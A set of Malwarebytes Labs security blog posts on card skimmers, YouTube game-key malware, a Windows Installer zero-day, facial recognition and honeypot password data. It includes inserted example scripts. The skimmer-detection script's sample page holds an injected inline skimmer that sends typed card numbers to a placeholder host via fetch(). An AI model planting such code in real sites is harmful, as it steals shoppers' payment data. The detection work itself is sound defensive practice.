The report also briefly branches out into other realms of concern. Bogus job descriptions posing as Samsung PDFs were deliberately malformed, leading to follow-up messages containing malware lurking at the links provided by the sender.

This campaign is apparently from a North Korean government-backed group, which previously targeted security researchers. There’s also a lengthy rundown of Black Matter ransomware, and (again) various tips for Google specific cloud products in terms of keeping the Black Matter threat at arm’s length.

The full report is a PDF weighing in at 28 pages long. Yes, it’s a bit light on details. However, it’s quite possible to send people running for the hills with 80+ pages of heavy-duty security information. If people are making rudimentary mistakes, why not make a gesture of highlighting said mistakes?

Simply does it

As we heard in our recent Lock and Code episode, the basics are no laughing matter. Many organisations don’t have the time, money, or resources available. They’re unable to tackle what some would consider to be incredibly obvious issues. There’s plenty of detailed security information out there already on multiple Google pages. Maybe it’s possible that this back to basics approach will pay off in the long run.

If Google’s main concern is mostly “script kiddy with a cryptominer”, then a script-kiddy-with-a-cryptominer focus we shall have. For now, we’ll just have to wait and see what kind of uptake this new approach receives and go from there.


The post Google’s Threat Horizons report: Will the straightforward approach get results? appeared first on Malwarebytes Labs.


Improving security for mobile devices: CISA issues guides

Thu, 11/25/2021 - 16:20

The Cybersecurity and Infrastructure Security Agency (CISA) has released two actionable Capacity Enhancement Guides (CEGs) to help users and organizations improve mobile device cybersecurity.


One of the guides is intended for consumers. There are an estimated 294 million smart phone users in the US, which makes them an attractive target market for cybercriminals. Especially considering that most of us use these devices every day.

The advice listed for consumers is basic and our regular readers have probably seen most of it before. But it never hurts to repeat good advice and it may certainly help newer visitors.

  • Stay up to date. Make sure that your operating system (OS) and the apps you use are up to date, and enable automatic updating where possible.
  • Use strong authentication. Make sure to use strong passwords or PINs to access your devices, and biometrics if possible and when needed. For apps, websites and services, use multi-factor authentication (MFA) where possible.
  • App security:
    • Use curated app stores and stay away from apps that are offered through other channels. If they are not good enough for the curated app stores, they are probably not good for you either.
    • Delete unneeded apps. Remove apps that you no longer use, not only to free up resources, but also to diminish the attack surface.
    • Limit the amount of Personally Identifiable Information (PII) that is stored in apps.
    • Grant least privilege access to all apps. Don’t allow the apps more permissions than they absolutely need in order to do what you need them to do, and minimize their access to PII.
    • Review location settings. Only allow an app to access your location when the app is in use.
  • Network communications. Disable the network protocols that you are not using, like Bluetooth, NFC, WiFi, and GPS. And avoid public WiFi unless you can take the necessary security measures. Cybercriminals can use public WiFi networks, which are often unsecured, for attacks.
  • Protection:
    • Install security software on your devices.
    • Use only trusted chargers and cables to avoid juice jacking. A malicious charger or PC can load malware onto smartphones that may circumvent protections and take control of them. A phone infected with malware can also pose a threat to external systems such as personal computers.
    • Enable lost device functions or a similar app. Use auto-wipe settings or apps to remove data after a certain number of failed logins, and enable the option to remotely wipe the device.
  • Phishing protection. Stay alert, don’t click on links or open attachments before verifying their origin and legitimacy.


The guide for organizations does duplicate some of the advice given to consumers, but it has a few extra points that we would like to highlight.

  • Security focused device management. Select devices that meet enterprise requirements with a careful eye on supply chain risks.
  • Use Enterprise Mobility Management solutions (EMM) to manage your corporate-liable, employee-owned, and dedicated devices.
  • Deny access to untrusted devices. Devices are to be considered untrusted if they have not been updated to the latest platform patch level; they are not configured and constantly monitored by EMM to enterprise standards; or they are jailbroken or rooted.
  • App security. Isolate enterprise apps. Use security container technology to isolate enterprise data. Your organization’s EMM should be configured to prevent data exfiltration between enterprise apps and personal apps.
  • Ensure an app vetting strategy is in place for enterprise-developed applications.
  • Restrict OS/app synchronization. Prevent data leakage of sensitive enterprise information by restricting the backing up of enterprise data by OS/app-synchronization.
  • Disable user certificates. User certificates should be considered untrusted because malicious actors can use malware hidden in them to facilitate attacks on devices, such as intercepting communications.
  • Use secure communication apps and protocols. Many network-based attacks allow the attacker to intercept and/or modify data in transit. Configure the EMM to use VPNs between the device and the enterprise network.
  • Protect enterprise systems. Do not allow mobile devices to connect to critical systems. Infected mobile devices can introduce malware to business-critical ancillary systems such as enterprise PCs, servers, or operational technology systems. Instruct users to never connect mobile devices to critical systems via USB or wireless. Also, configure the EMM to disable these capabilities.

While you may not feel the need to apply all the advice listed above, it is good to at least know about it and consider whether it fits into the security posture that matches your infrastructure and threat model.

Stay safe, everyone!

The post Improving security for mobile devices: CISA issues guides appeared first on Malwarebytes Labs.


New law will issue bans, fines for using default passwords on smart devices

Thu, 11/25/2021 - 14:26

The idea of connecting your entire home to the internet was once a mind-blowing concept. Thanks to smart devices, that concept is now a reality. However, this technological advancement aimed at making our lives more convenient—not to mention very cool and futuristic!—has also opened a wide door for potential cybercriminals.

New figures from a recent investigation conducted by Which?, the UK’s leading consumer awareness and review site, say that smart devices could be exposed to over 12,000 hacking and unknown scanning attacks in a single week. And smart devices are big news—a study commissioned by the UK government in 2020 revealed that almost half (49 percent) of UK residents purchased at least one smart device since the pandemic started.

And because of our high propensity to forgo changing default passwords that came with the smart devices we buy, we’re essentially putting ourselves—our homes and our family’s data and privacy—at the forefront of online attacks without us knowing.

To help address this cybersecurity and privacy problem, the UK government will soon roll out the Product Security and Telecommunications Infrastructure (PSTI) Bill that bans the use of default passwords for all internet-connected devices for the home, which we all call the Internet of Things (IoT). This law covers smartphones, routers, games consoles, toys, speakers, security cameras, internet-enabled white goods (fridge, washing machine, etc.) but not vehicles, smart meters, smart medical devices, laptops, and desktop computers. Firms that don’t comply will face huge fines.

The BBC has highlighted three new rules under this bill:

  • Easy-to-guess default passwords preloaded on devices are banned. All products now need unique passwords that cannot be reset to factory default
  • Customers must be told when they buy a device the minimum time it will receive vital security updates and patches. If a product doesn’t get either, that must also be disclosed
  • Security researchers will be given a public point of contact to point out flaws and bugs

A regulator will be appointed to oversee this bill once it is fully enforced. They will also have the power to fine manufacturers of vulnerable smart devices and the markets that sell them (Amazon, for example) up to £10 million or 4% of their global earnings. They can also impose an additional fine of £20,000 a day if the company continues to be in violation of the law.

“This is just the first step”

Julia Lopez, the Minister of State at the Department for Digital, Culture, Media and Sport, said: “Our bill will put a firewall around everyday tech from phones and thermostats to dishwashers, baby monitors and doorbells, and see huge fines for those that fall foul of tough new security standards.”

While Ken Munro, a security consultant for Pen Test Partners, told the BBC he sees the bill as a “big step in the right direction”, he also cautions about complacency, “However, it’s important that government acknowledges that this is just the first step. These laws will need continual improvement to address more complex security issues in smart devices,” he said.

The post New law will issue bans, fines for using default passwords on smart devices appeared first on Malwarebytes Labs.


Beware card skimmers this Black Friday

Thu, 11/25/2021 - 10:23

The UK’s top cybercops are urging owners of small online shops to “protect their customers and profits” by guarding against card skimmers in the frenetic shopping period that starts with Black Friday, which lands on November 26 this year.

The warning comes from the National Cyber Security Centre (NCSC)—which is part of GCHQ, the UK’s equivalent to the NSA—which says it identified 4,151 compromised online shops up to the end of September.

Card skimmers, also known as web skimmers, are bits of malicious software that are injected into legitimate websites so they can steal shoppers’ credit card details. The skimmers read the details as users type them into the sites’ payment forms, or replace the payment forms with convincing fakes.

The longer that cybercriminals can keep their card skimmers on a website before its customers or owners notice, the more money they will make, so they take care to be as unobtrusive as possible. Unsurprisingly, Malwarebytes’ own research has shown that card skimming activity tends to ramp up on the busiest shopping days, when the most money changes hands. And some of the biggest shopping days of the year are nearly upon us, starting with Black Friday, the biggest of them all.

For the uninitiated, Black Friday is the annual celebration of peak capitalism that commemorates the symbolic moment that retailers go “into the black” for the year and start to make a profit. If you’re wondering why shoppers would be so keen to celebrate the mechanics of retail accountancy, it’s because shops mark the occasion (the Friday that follows Thanksgiving in the US) with extravagant sales, offers, and deals.

The NCSC is rightly concerned that with record amounts of money expected to slosh about on the Internet in the next few days, cybercriminals will be hard at work, spoiling everyone’s fun.

Yes, you

It is worth noting that the NCSC’s announcement uses the word “small” no less than four times— “small online shops”; “small business sites”; “small online retailers”; “small and medium-sized online retailers”—in a short announcement that also mentions “SMEs” twice, and says it is written for “small & medium sized organisations”.

On the off-chance the point still hasn’t landed, let me spell it out for you: The NCSC would like you to know that no online business is small enough to ignore the threat of card skimmers.

I will add a personal note to that too. If you assume you are too small to be attacked by a card skimmer and your customers later find out their card details were stolen while on your site, they will expect you to have cared a great deal more. At least that’s how I felt when it happened to me.

Not just Magento

Although its guidance is aimed at all e-commerce retailers, the NCSC makes specific mention of sites built on the Magento platform, which it says has been particularly popular with cybercriminals lately:

The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform.

However, your takeaway after reading that should not be “Magento” so much as “known vulnerability”. Cybercriminals do not care that you’re running Magento, they only care that you are running a system they can exploit because it contains a known vulnerability, and any system with a known vulnerability will do, thanks. It so happens that Magento has been a prime target recently, but every decent e-commerce system has known vulnerabilities. Not using Magento is no protection whatsoever.

What really matters is whether or not e-commerce sites are patched promptly when fixes for vulnerabilities are made available. Which is why the NCSC’s headline guidance is “Retailers are urged to ensure that Magento—and any other software they use—is up to date”.

Keeping website software up to date will certainly take you a very long way indeed in terms of protecting against card skimmers, but there is more to it than that.

For the “more to it than that”, the NCSC points readers to the British Retail Consortium’s Cyber Resilience Toolkit for Retail, and to its own website, which is full of useful cybersecurity advice, although neither resource is specifically about card skimming.

I would like to humbly suggest that readers should also consult our own guidance on how to defend your website against card skimmers. Our easy-to-digest advice is aimed at preventing card skimming specifically and explains how card skimming gangs find victims; why everyone is a potential target; how to avoid a website breach; how to protect your customers from a card skimmer if you are breached; and how to detect card skimmers as quickly as possible.
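As an added example of the “detect card skimmers as quickly as possible” point (not NCSC or Malwarebytes tooling), the script below audits the HTML of a checkout page the way a site owner might after every deploy: any external script host missing from a recorded baseline is reported, and any inline script that both references payment fields and hooks input events or makes network calls is flagged. The baseline hosts, the sample page and the injected inline script are all constructed for this example.

```python
"""Checkout-page script audit.

Card skimmers need two things the page author did not put there: a script that
reads the payment form, and a way to send what it read somewhere else. Both leave
traces in the served HTML, so comparing each deploy against a known-good baseline
catches most injections early. Added example; not part of any official guidance.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed baseline: hosts expected to serve scripts on the checkout page.
# In practice this is recorded from a known-good deployment and kept in version control.
BASELINE_HOSTS = {"shop.example", "js.payment-provider.example"}

# Heuristics for inline scripts: payment-field names, input hooks, and outbound calls.
PAYMENT_FIELD_RE = re.compile(r"card|cc[_-]?num|cvv|cvc|expir", re.IGNORECASE)
INPUT_HOOK_RE = re.compile(r"addEventListener\(\s*['\"](keyup|keydown|input|change|submit)", re.IGNORECASE)
NETWORK_RE = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|\.src\s*=|WebSocket", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src=...>
        self.inline = []     # bodies of <script>...</script> without src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_checkout_page(html, baseline_hosts, page_host):
    """Return a list of (finding_type, host, detail) tuples; empty means nothing unexpected."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or page_host   # relative URL: served by the shop itself
        if host not in baseline_hosts:
            findings.append(("unknown_script_host", host, src))
    for body in parser.inline:
        touches_payment = bool(PAYMENT_FIELD_RE.search(body))
        hooks_input = bool(INPUT_HOOK_RE.search(body))
        calls_out = bool(NETWORK_RE.search(body))
        if touches_payment and (hooks_input or calls_out):
            findings.append(("suspicious_inline_script", None, body.strip()[:80]))
    return findings


# Constructed sample: a legitimate checkout page with one injected script host and
# one injected inline script that watches the card-number field and posts it elsewhere.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://js.payment-provider.example/v3/checkout.js"></script>
<script>window.shopConfig = {currency: "GBP", cartId: "c-1042"};</script>
<script src="https://static-analytics.invalid/m.js"></script>
<script>
document.querySelector('#cc_number').addEventListener('keyup', function (e) {
  fetch('https://static-analytics.invalid/c?d=' + encodeURIComponent(e.target.value));
});
</script>
</head><body><form id="payment"><input id="cc_number"></form></body></html>
"""

if __name__ == "__main__":
    for kind, host, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML, BASELINE_HOSTS, "shop.example"):
        print(f"{kind:26} {host or '-':32} {detail}")
```

Run it against every deploy and alert on any non-empty result; the legitimate config script is not flagged because it neither touches payment fields nor calls out.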

The post Beware card skimmers this Black Friday appeared first on Malwarebytes Labs.


“Free Steam games” videos promise much, deliver malware

Wed, 11/24/2021 - 16:46

Gamers are a hot target for scammers, especially in the run up to Christmas. Major games are released throughout the last few months of any year, and the FOMO (fear of missing out) is strong. Especially if said titles offer pre-order exclusive bonuses, or deals and discounts for a few weeks after the game launches.

There’s a lot of big titles hitting digital storefronts at the moment. In the last few weeks alone we’ve seen the release of:

  • Skyrim Anniversary Edition
  • Forza Horizon 5
  • Jurassic World Evolution 2
  • Halo Infinite (portions of it, with more to come)
  • Myth of Empires
  • Battlefield 2042

Add other upcoming titles and older ones updated for the festive season into the mix, and it’s fertile ground for people up to no good.

Bogus YouTube videos promise much, deliver little

We’ve seen a lot of activity on YouTube in the last 24 hours in relation to dubious videos. They ride on the coat tails of common searches for “free” versions of popular titles like Skyrim, CSGO, PUBG, Cyberpunk, and more. Other videos focus on Call of Duty, GTAV, Fallout 4, and DayZ.

In all cases, “free Steam keys” are the name of the fake-out game. No matter which of the many accounts posts these videos, they all typically link to the same download hosting site.

When free games lead to Malware

The file offered up for download is SteamKeyGeneration.rar, weighing in at 4.19MB. YouTube pages containing the link offer the following instructions:

“Download the ExLoader, open the RAR file, open the EXE file”

The .RAR is password protected, with the password being supplied in the YouTube description. Once the executable runs on the target system, it’s infected by the owner’s own hand.

We detect the file as Trojan.Malpack. This is a generic name given to files which have been packed suspiciously. The actual payload can be anything at all, but this form of packing files is not typically used for legitimate purposes. We’ve seen similar attacks like this previously. In 2018, Fortnite gamers were targeted by scammers pushing Trojan.Malpack files as Fortnite freebies. If the files were downloaded and run on the target system, the reward for doing so was data theft.

Part of a bigger campaign, or a standalone?

YouTube has definitely had some trouble along these lines recently. Researchers at Cluster25 spotted similar activity, targeting a multitude of interests including how-to guides, cryptocurrency, VPN software, and more. In those cases, activity seems to be primarily geared towards two infection paths.

Videos with bit(dot)ly links send victims to download sites such as Mega. Unshortened links redirect to taplink(dot)cc to push Raccoon Stealer. Target machines are scanned for card details, passwords, cryptocurrency wallets and other forms of data. This is all harvested and sent on to the attacker.

Despite the final destination links being different from those mentioned, there are similarities, such as the password requirement and the overall scam setup. Of course, this isn’t a particularly new or novel tactic for YouTube attacks. Including a link to an off-site compressed file on free file hosting, and disabling comments so nobody can point out they’ve had things stolen, is video portal shenanigans 101.

You also tend to see one major campaign hit and enjoy success, and then lots of smaller would-be scammers jump on the bandwagon and before long everybody is doing it.

Tips to avoid scams

Whether this is part of the same campaign, a spin-off, or is simply inspired by it, you should avoid any promise of free games deploying these techniques on YouTube. The warning signs are:

  1. Too good to be true claims of Steam (or another platform) being “hacked”, with free games being the end result.
  2. Brand new accounts with no other content than these videos. Much older accounts which have been dormant until now, or display a sudden shift in content produced. Were they making videos of their cats until last week and now they’re all about hacked Skyrim downloads? Beware.
  3. Comments disabled. Anybody linking to off-site files and turning off the comments may not have your best interests at heart.

Getting your hands on a cool new game at a discount is always good news, but sometimes the hidden cost is just too high.

The post “Free Steam games” videos promise much, deliver malware appeared first on Malwarebytes Labs.


Windows Installer vulnerability becomes actively exploited zero-day

Wed, 11/24/2021 - 14:21

Sometimes the way in which malicious code gets into the hands of cybercriminals is frustrating for those in the industry, and incomprehensible to those on the outside.

A quick summary of the events in the history of this exploit:

  • A researcher found a flaw in Windows Installer that would allow an attacker to delete targeted files on an affected system with elevated privileges.
  • Microsoft patched the vulnerability in November’s Patch Tuesday update.
  • The researcher found a way to circumvent the patch and this time decided not to engage in responsible disclosure because he got frustrated with Microsoft’s bug bounty program.
  • The researcher’s PoC is being tested in the wild and cybercriminals could be preparing the first real attacks exploiting this vulnerability.

Let’s have a look at what is going on and how it came to this.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

The vulnerability in question was listed as CVE-2021-41379 and is a local Windows Installer Elevation of Privilege (EoP) vulnerability. If successfully exploited, the bypass could give attackers SYSTEM privileges on up-to-date devices running the latest Windows releases, including Windows 10, Windows 11, and Windows Server 2022.

By exploiting this zero-day, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.

The patch

Microsoft patched the vulnerability in the November Patch Tuesday updates. But according to the researcher, the bug was not fixed correctly. He discovered a new variant during the analysis of the CVE-2021-41379 patch.

With the new variant, an attacker will be able to run programs with a higher privilege than they are entitled to. To be clear, an attacker using the new variant must already have access and the ability to run code on a target victim’s machine, but now they can run the code with SYSTEM privileges thanks to the exploit.

The frustration

The researcher appears to have been so disappointed in Microsoft after he responsibly disclosed the vulnerability by means of the Trend Micro zero-day initiative, that he decided to skip that path altogether when he found the new method to bypass the patch. The researcher published a new version of the proof of concept (PoC) exploit, which is even more powerful than the original exploit.

Apparently the main reason for his frustration was the reward level.

“Microsoft’s rewards have been very bad since April 2020; the community wouldn’t make these kinds of decisions if Microsoft took its rewards seriously.”

In the wild

Several security vendors have noticed malware samples in the wild that are attempting to take advantage of this vulnerability. A quick search on VirusTotal showed dozens of different files that tried to do this. This may be some threat actors testing the exploit code to turn it into something they can use in their attacks, along with some researchers trying out different ways to use and stop the exploit. It is worrying nonetheless to see once again how quickly attackers are able to weaponize publicly available exploit code.


The researcher recommends users wait for Microsoft to release a security patch, due to the complexity of this vulnerability, although he doesn’t seem confident that Microsoft will get it right this time.

“Any attempt to patch the binary directly will break windows installer. So you better wait and see how Microsoft will screw the patch again.”

Microsoft says it is working on it. In the meantime, Malwarebytes Premium and business users are protected, because our programs detect the files using this vulnerability as Exploit.Agent.

Malwarebytes detects and stops the exploit

Stay safe, everyone!

The post Windows Installer vulnerability becomes actively exploited zero-day appeared first on Malwarebytes Labs.


What is facial recognition?

Wed, 11/24/2021 - 12:44

Facebook recently announced it would give up on its facial recognition system. Facebook, or Meta, was using software to automatically identify people in images posted to its social network. Since facial recognition has become an increasingly toxic concept in many circles and Facebook had enough to deal with as it is, it shut the “feature” down. But that doesn’t mean that the technology no longer exists, or even that it isn’t used anymore.

Let’s establish first what we consider facial recognition to be.

By definition: A facial recognition system is a technology capable of matching a human face from a digital image or a video frame against a database of faces, typically employed to identify and/or authenticate users.

In layman’s terms, facial recognition is technology to recognize a human face.

How does facial recognition work?

There are different systems and algorithms that can perform facial recognition, but at the basic level they all function the same—they use biometrics to map facial features from a photograph or video. The image is captured and reduced to a set of numbers that describes the face that needs to be identified. The software analyses the shape of the face by taking certain measurements that, all put together, provide a unique characteristic for the face. The shape of the face is reduced to a mathematical formula, and the numerical code of that formula is called a “faceprint.” Such a faceprint can be quickly compared to those stored in a database in order to identify the person.

You can compare this to a person leafing through an enormous book of portraits to find a suspect. Only much faster because now it’s a computer comparing sets of numbers.

How is facial recognition used?

The most well-known example of facial recognition is the one that can be used to unlock your phone or similar. In those cases, your face is compared to the ones that are authorized to use the phone.

Another convenient method of facial recognition can be found in some major airports around the world. An increasing number of travelers hold a biometric passport, which allows them to skip the long lines and walk through an automated ePassport control to reach their gate faster. This type of facial recognition not only reduces waiting times but also allows airports to improve security.

A lot less consensual is the fact that in some countries mobile and/or CCTV facial recognition is used to identify any person, by immediately comparing an image against one or more face recognition databases. In total, there are well over 100 countries today that are either using or have approved the use of facial recognition technology for surveillance purposes. This has brought up a lot of questions about our privacy.
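To make the “faceprint compared against a database” description concrete, here is an added example (not from the original post or from any vendor’s product) using constructed four-dimensional faceprints in place of the long embedding vectors real systems produce. It shows the two uses described above as two different matching operations: a 1:1 verification like a phone unlock, and a 1:N identification like a CCTV or airport search, where the match threshold decides whether a stranger gets wrongly identified.

```python
"""Faceprint matching: 1:1 verification versus 1:N identification.

A faceprint is a vector of numbers describing a face. Matching means measuring how
close two such vectors are and comparing the result to a threshold. Added example
with constructed vectors; real systems use embeddings with hundreds of dimensions.
"""
import math

# Constructed enrolled database: identity -> faceprint template.
ENROLLED = {
    "alice": [0.90, 0.10, 0.30, 0.20],
    "bob":   [0.20, 0.85, 0.10, 0.40],
    "carol": [0.30, 0.30, 0.90, 0.10],
}

# Constructed probes: a fresh capture of Alice, and someone who is not enrolled at all.
ALICE_PROBE = [0.85, 0.15, 0.35, 0.25]
STRANGER_PROBE = [0.60, 0.60, 0.30, 0.30]


def cosine_similarity(a, b):
    """Similarity in [-1, 1]; 1.0 means identical direction (same face, ideally)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm


def verify(probe, claimed_id, db, threshold):
    """1:1 check (phone unlock): does the probe match the one claimed identity?

    Only one comparison is made, so a single threshold bounds the false-match risk.
    """
    return cosine_similarity(probe, db[claimed_id]) >= threshold


def identify(probe, db, threshold):
    """1:N search (CCTV, airport gate): best-scoring identity above threshold, else None.

    Every enrolled template is compared, so the chance that *some* stranger scores
    above the threshold grows with the size of the database. That is why a threshold
    that is fine for unlocking a phone can produce false identifications at scale.
    """
    best_id, best_score = None, -1.0
    for person_id, template in db.items():
        score = cosine_similarity(probe, template)
        if score > best_score:
            best_id, best_score = person_id, score
    if best_score >= threshold:
        return best_id, best_score
    return None, best_score


if __name__ == "__main__":
    print("verify alice as alice:", verify(ALICE_PROBE, "alice", ENROLLED, 0.95))
    print("identify alice:", identify(ALICE_PROBE, ENROLLED, 0.95))
    # The stranger is nobody in the database, yet a loose threshold names "bob".
    print("stranger, loose threshold:", identify(STRANGER_PROBE, ENROLLED, 0.80))
    print("stranger, strict threshold:", identify(STRANGER_PROBE, ENROLLED, 0.95))
```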

What is bad about facial recognition?

As we can see from the above, facial recognition is not always bad, and it can be used to improve our personal and public security. It becomes a privacy issue when the consent of the person in the database is missing. People, especially in large cities, have become used to being monitored for much of the time they spend outside. But when facial recognition adds the extra layer of tracking, or the possibility to do so, it becomes worrying.

China, for example, is already a place deeply wedded to multiple tracking/surveillance systems. According to estimates, there are well over 400 million CCTV cameras in the country, and they do not shy away from using facial recognition in public shaming to crack down on people that are jaywalking and other minor traffic offenders.

It’s because of the privacy implications that some tech giants have backed away from the technology, or halted its development. Many groups, like the American Civil Liberties Union (ACLU) and the Electronic Frontier Foundation (EFF), have objected to facial recognition technology, as using biometrics to track and identify individuals without their consent is considered a breach of privacy. Many feel that there is already more than enough technology out there that keeps track of our behavior, preferences, and movement.

Can I use facial recognition to find someone?

For an individual to identify another individual would require access to a large database or an enormous amount of luck. As we explained, the faceprints are compared with those in a database. And that database has to contain a pretty large subset of the population you are looking in.

But there are other ways to identify an individual who is nowhere to be found in the database. A picture can be compared to one that is openly posted on social media. Some organizations have built sizable databases just by harvesting pictures from social media. And you might be amazed at what a reverse image search can bring up. In essence, your chance of success in finding a person based on a picture depends on how sophisticated your search algorithm is and how many pictures of your subject can be found on the Internet.

Conversely, if you do not want to be found, make sure that you don’t post your pictures everywhere, and when you do, make sure they are not publicly accessible. And stay out of the databases.

If you are interested in the subject of facial recognition, you may also want to listen to S1Ep6 of the Malwarebytes podcast Lock and Code, where we talk with Chris Boyd about “Recognizing facial recognition’s flaws.”

The post What is facial recognition? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Password usage analysis of brute force attacks on honeypot servers

Wed, 11/24/2021 - 11:25

As Microsoft’s Head of Deception, Ross Bevington is responsible for setting up and maintaining honeypots that look like legitimate systems and servers.

Honeypot systems are designed to pose as an attractive target for attackers. Sometimes they are left vulnerable to create a controllable and safe environment to study ongoing attacks. This provides researchers with data on how attackers operate and enables them to study different threats.

In Bevington’s words:

“I develop and lecture on these technologies with emphasis on the human behind the keyboard and how to integrate Deception into general security posture.”

Now, Bevington has released information gathered from Microsoft honeypots of over 25 million brute force attacks against SSH.

Secure Shell (SSH) is a protocol optimized for Linux server access, but it can be used across any operating system’s server. Remote Desktop Protocol (RDP) is almost exclusively used for accessing Windows virtual machines and physical Windows servers. Based on data provided by Bevington, which were taken from more than 14 billion brute-force attack attempts against Microsoft’s network of honeypot servers until September this year, attacks on Remote Desktop Protocol (RDP) servers have seen a rise of 325%.

RDP is one of the most popular targets because it is a front door to your computer that can be opened from the Internet by anyone with the right password. And because of the ongoing pandemic, many people are working from home and may be doing so for a while to come. Working from home has the side effect of more RDP ports being opened.

The data

The analysis looked at the credentials attempted during more than 25 million brute force attacks against the Microsoft honeypot systems, which roughly represents a period of 30 days.

Some highlights of these results:

  • 77% of the passwords were between 1 and 7 characters long
  • Only 6% of the passwords were longer than 10 characters
  • 39% of the passwords contained at least one number
  • None of the attempted passwords contained a space

The data above can help you determine whether one password is more secure than another. But there are some caveats. Passwords need to be long and complex because it’s their length, complexity and uniqueness that determine how difficult they are to crack.

However, you can have the longest password in the world, but if it has been leaked in a breach there is a chance that an attacker will add it to their dictionary. This is the reason we tell you not to re-use your passwords. It’s inconvenient to lose one in a breach, but if that means having to change your password on multiple sites and services, it’s a major inconvenience.
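As an added illustration (not Microsoft’s or Malwarebytes’ code), the script below computes the same kind of highlights from a honeypot’s own log and then checks whether a candidate password has already turned up in the attackers’ attempts, which is the re-use point made just above. It runs on a few constructed log lines in the JSON shape the Cowrie SSH honeypot writes for failed logins (`cowrie.login.failed` events with `username` and `password` fields), so the percentages it prints are those of the sample, not the figures in the list above; the function names are this example’s.

```python
"""Profile the passwords tried against an SSH honeypot, and check a candidate
password against that observed attacker dictionary.

Added example, not Microsoft's or Malwarebytes' code. The input is a few
constructed log lines in the JSON shape the Cowrie SSH honeypot writes for
failed logins; Microsoft's 25-million-attempt dataset is not on the page,
so the percentages below are those of the sample, not the article's.
"""
import json
from collections import Counter

# Constructed sample events. Passwords are chosen to exercise every statistic,
# including one with a space, one duplicate, a non-login event and a truncated line.
SAMPLE_LOG = """
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "192.0.2.10"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "192.0.2.11"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "P@$$w0rd", "src_ip": "192.0.2.12"}
{"eventid": "cowrie.login.failed", "username": "ubuntu", "password": "MyDogsName1", "src_ip": "192.0.2.13"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "192.0.2.14"}
{"eventid": "cowrie.session.connect", "src_ip": "192.0.2.15"}
{"eventid": "cowrie.login.failed", "username": "pi", "password": "raspberry", "src_ip": "192.0.2.16"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "qwerty123", "src_ip": "192.0.2.17"}
{"eventid": "cowrie.login.failed", "username": "test", "password": "test", "src_ip": "192.0.2.18"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "correct horse battery", "src_ip": "192.0.2.19"}
{"eventid": "cowrie.login.failed", "username": "oracle", "password": "oracle", "src_ip": "192.0.2.20"}
{"eventid": "cowrie.login.failed", "username": "root", "pass
"""


def attempted_passwords(log_text):
    """Yield the password from every failed-login event.

    Other event types are skipped, and so are lines that do not parse:
    honeypot logs routinely end in a truncated line, and one bad record
    must not abort a 30-day analysis.
    """
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if event.get("eventid") == "cowrie.login.failed" and "password" in event:
            yield event["password"]


def summarize(log_text):
    """Return the same kind of highlights the article lists, for the given log."""
    passwords = list(attempted_passwords(log_text))
    total = len(passwords)

    def pct(count):
        return round(100.0 * count / total, 1) if total else 0.0

    return {
        "total": total,
        "pct_len_1_to_7": pct(sum(1 for p in passwords if 1 <= len(p) <= 7)),
        "pct_longer_than_10": pct(sum(1 for p in passwords if len(p) > 10)),
        "pct_with_digit": pct(sum(1 for p in passwords if any(c.isdigit() for c in p))),
        "pct_with_space": pct(sum(1 for p in passwords if " " in p)),
        "most_common": Counter(passwords).most_common(3),
    }


def seen_in_attacks(candidate, log_text):
    """True when attackers have already tried this exact string.

    Length and complexity stop mattering once a password is in the
    attacker's dictionary, which is why re-use across sites is the problem.
    """
    return candidate in set(attempted_passwords(log_text))


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
    print("MyDogsName1 already tried:", seen_in_attacks("MyDogsName1", SAMPLE_LOG))
```

Pointing `summarize` at a real honeypot log gives a local picture of what attackers try against your own address space; `seen_in_attacks` is the simplest form of a deny-list check, and a password that appears there should be treated as burned regardless of how long it is.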

In an older study by Microsoft, it was determined that users should spend less effort on password management issues for don’t-care and lower consequence accounts, allowing more effort on higher consequence accounts. Unless you are using a password manager doing the work for you, of course. Your efforts to come up with a strong password are wasted at sites that store passwords in plaintext or reversibly encrypted.

Sites that require minimum length and/or use other complexity standards have always been a major annoyance. Not only because every site uses a different standard, some of which have been made obsolete, they also encourage users to come up with simple passwords that just barely meet the standard. Am I right, MyDogsName1 and P@$$w0rd?

One of the recommendations of the earlier Microsoft study was that organizations should invest their own resources in securing systems rather than simply offloading the cost to end users in the form of advice, demands or enforcement policies that are often pointless.

The fact that none of the attempts contained a space supports the advice that recommends using three random words separated by spaces: easy to remember, easy to type (especially on smaller devices) and harder to guess.

Passwordless future

